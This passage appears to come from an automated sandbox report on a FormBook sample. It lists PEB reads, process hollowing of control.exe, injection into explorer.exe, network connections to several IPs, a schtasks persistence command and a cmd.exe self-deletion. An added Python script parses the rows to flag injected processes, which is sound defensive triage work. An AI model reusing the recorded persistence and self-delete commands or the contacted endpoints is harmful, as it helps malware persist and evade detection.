          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05443884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053C40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_05498B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_054453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0548138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_0547D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05495BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05454257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0547B260 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053CAA16 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05498A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053C5210 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0540927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_0548AA16 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_05404A2C mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053C9240 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053DAAB0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053C52A5 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053FD294 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 5_2_053F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E96CF0 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EAC450 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE740D mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E96C0A mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h] (x14)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2D5E0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDFDE2 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EC8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E96DC9 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E96DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE05AC mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E41DB5 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42581 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E12D8A mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4FD9B mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3C577 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E53D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E93540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EC3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E37D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h] (x13)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E9A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E44D3B mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E58EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ECFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE0EA5 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EAFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3AE73 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E27E41 mov eax, dword ptr fs:[00000030h] (x6)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EDAE44 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ECFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1C600 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E48E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4A61C mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E28794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E97794 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E14F2E mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE070D mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4A70E mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EAFF10 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E140E1 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E158EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EAB8D0 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EAB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E420A0 mov eax, dword ptr fs:[00000030h] (x6)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E590AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4F0BF mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E19080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E93884 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E30050 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2B02A mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4002D mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EE4015 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E97016 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1B1E1 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04EA41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E461A0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04ED49A4 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E969A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E951BE mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E1B171 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E3B944 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E34120 mov eax, dword ptr fs:[00000030h] (x4)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E34120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4513A mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E19100 mov eax, dword ptr fs:[00000030h] (x3)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E152A5 mov eax, dword ptr fs:[00000030h] (x5)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E2AAB0 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exe | Code function: 8_2_04E4D294 mov eax, dword ptr fs:[00000030h] (x2)
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process token adjusted: Debug
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Memory allocated: page read and write | page guard
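Every `mov eax, dword ptr fs:[00000030h]` row above loads the 32-bit PEB pointer from the TEB, which is the first step of the usual anti-analysis checks (BeingDebugged, NtGlobalFlag) and of manual import resolution through the loader's module list. The triage question is not whether such reads exist, since ntdll and the CRT do them too, but where the reading code lives: control.exe's image, which the report places at base B80000, does not cover the 0x04Exxxxx functions listed for it, and vbc.exe, the Visual Basic compiler, has no reason to carry this code at all. The script below is an added example, not part of this report or of Joe Sandbox's tooling; it parses rows in the listing's format, aggregates PEB reads per process and flags Windows binaries whose PEB-reading functions all lie outside their own image. The sample rows, the per-process image ranges (only the control.exe base comes from the report; the sizes and the vbc.exe base are placeholders) and the field names are constructed assumptions.

```python
"""Added triage helper (not from the report): group the fs:[30h] PEB reads in
Joe Sandbox 'Code function' rows by process and flag PEB-reading code that
lives outside the host process's own image."""
import re

# Row format used in the listing. The optional " | " tolerates both the raw
# extracted form ("vbc.exeCode function:") and the cleaned one.
ROW = re.compile(
    r"Source:\s*(?P<image>.+?)\s*\|?\s*Code function:\s*"
    r"(?P<proc>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\s+(?P<instr>.+)$"
)
# 32-bit PEB pointer load: mov <reg>, dword ptr fs:[30h]
PEB_READ = re.compile(r"\bmov\s+e[a-d]x,\s*dword ptr fs:\[0*30h\]", re.I)

# Constructed sample rows. Process ids and addresses mirror the report
# (5 = vbc.exe, 8 = control.exe); the counts do not.
SAMPLE_ROWS = """\
Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe | Code function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exeCode function: 5_2_053F03E2 mov eax, dword ptr fs:[00000030h]
Source: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe | Code function: 5_2_053C5210 mov ecx, dword ptr fs:[00000030h]
Source: C:\\Windows\\SysWOW64\\control.exe | Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\\Windows\\SysWOW64\\control.exe | Code function: 8_2_04ED1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\\Windows\\SysWOW64\\control.exe | Code function: 8_2_04E23D34 mov eax, dword ptr fs:[00000030h]
Source: C:\\Windows\\SysWOW64\\control.exe | Code function: 8_2_04E23D34 call dword ptr [ebp+8]
"""

# ASSUMED image ranges per process. The control.exe base (B80000) is the one
# the report names in its "Section unmapped" row; the sizes and the vbc.exe
# base are placeholders that real triage would take from the module list.
IMAGE_RANGES = {5: (0x00400000, 0x00500000), 8: (0x00B80000, 0x00C00000)}


def parse_rows(text):
    """Return one dict per row that is a 32-bit PEB read; other rows are dropped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m or not PEB_READ.search(m["instr"]):
            continue
        rows.append({"image": m["image"], "proc": int(m["proc"]),
                     "addr": int(m["addr"], 16), "instr": m["instr"]})
    return rows


def summarize(rows, image_ranges=IMAGE_RANGES):
    """Per process: image path, total PEB reads, distinct reading functions,
    and which of those functions sit outside the process's own image."""
    out = {}
    for r in rows:
        s = out.setdefault(r["proc"], {"image": r["image"], "reads": 0,
                                       "functions": set(), "outside_image": set()})
        s["reads"] += 1
        s["functions"].add(r["addr"])
        lo, hi = image_ranges.get(r["proc"], (0, 0))
        if not lo <= r["addr"] < hi:
            s["outside_image"].add(r["addr"])
    return out


def flag_injected_hosts(summary):
    """A binary under C:\\Windows whose PEB-reading functions are all in
    non-image memory is hosting foreign code (the hollowed control.exe, and
    the vbc.exe that was spawned only to be hollowed)."""
    flagged = []
    for proc, s in sorted(summary.items()):
        under_windows = s["image"].lower().startswith("c:\\windows\\")
        if under_windows and s["functions"] and s["outside_image"] == s["functions"]:
            flagged.append(proc)
    return flagged


if __name__ == "__main__":
    summary = summarize(parse_rows(SAMPLE_ROWS))
    for proc, s in sorted(summary.items()):
        print(f"proc {proc} {s['image']}: {s['reads']} PEB reads in "
              f"{len(s['functions'])} functions, {len(s['outside_image'])} outside image")
    print("likely injected hosts:", flag_injected_hosts(summary))
```

The image-range check is what keeps this from firing on every process: the same fs:[30h] reads inside ntdll's own code are benign, so without a module map the per-process counts alone are only a prompt to look, not a verdict.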

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 192.0.78.208 80
          Source: C:\Windows\explorer.exe | Network Connect: 45.77.226.209 80
          Source: C:\Windows\explorer.exe | Network Connect: 142.44.212.169 80
          Source: C:\Windows\explorer.exe | Network Connect: 146.148.193.212 80
          Source: C:\Windows\explorer.exe | Network Connect: 192.155.166.181 80
          Source: C:\Windows\explorer.exe | Network Connect: 23.105.124.225 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.49.23.144 80
          Source: C:\Windows\explorer.exe | Network Connect: 173.234.175.134 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 205.134.254.189 80
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write (x2)
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\control.exe | Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Section unmapped: C:\Windows\SysWOW64\control.exe base address: B80000
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmpF65F.tmp'
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe {path}
          Source: C:\Windows\SysWOW64\control.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
          Source: explorer.exe, 00000006.00000000.242933358.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.259002702.000000000871F000.00000004.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.243440910.0000000001980000.00000002.00000001.sdmp, control.exe, 00000008.00000002.572507874.00000000036A0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Queries volume information: C:\Users\user\Desktop\J0OmHIagw8.exe VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\J0OmHIagw8.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000005.00000002.275625455.0000000004BC0000.00000040.00000001.sdmp, type: MEMORY
